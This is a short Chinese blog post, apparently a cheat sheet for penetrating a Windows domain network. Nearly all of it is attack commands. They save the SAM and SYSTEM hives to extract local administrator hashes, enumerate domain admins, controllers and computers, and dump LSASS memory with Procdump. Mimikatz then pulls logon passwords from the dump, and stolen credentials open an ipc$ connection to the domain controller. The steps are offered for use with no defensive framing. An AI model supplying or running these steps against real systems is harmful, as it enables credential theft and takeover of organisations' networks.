内网域渗透

本文介绍了如何导出本地管理员的Hash值,包括使用注册表工具保存SAM和SYSTEM文件、获取域管理员账号、域控制器信息、域名及域管理员密码等关键步骤。此外还涉及了使用Procdump捕获LSASS进程内存快照,以及利用Mimikatz工具解析这些信息的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

导出本地管理员 Hash
reg save hklm\sam sam.hive
reg save hklm\system system.hive

1.获得域管理员帐号 net group “domain admins” /domain
2.获得域控制器 net group “domain controllers” /domain
3.获得域名 net view /domain
4.获得域管理员密码 http://blog.youkuaiyun.com/yiyefangzhou24/article/details/11760277

Procdump.exe -accepteula -ma lsass.exe lsass.dmp
下载地址:http://technet.microsoft.com/en-us/sysinternals/dd996900
mimikatz #sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full

5.域中有多少台机器
net group "domain computers" /domain

获得域控ip: ping 域控服务器名称
ipc$ net use \\域控ip\ipc$ "password" /user:"username"
net use \\连接的ip\ipc$ /del 断开正在连接的ipc$

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值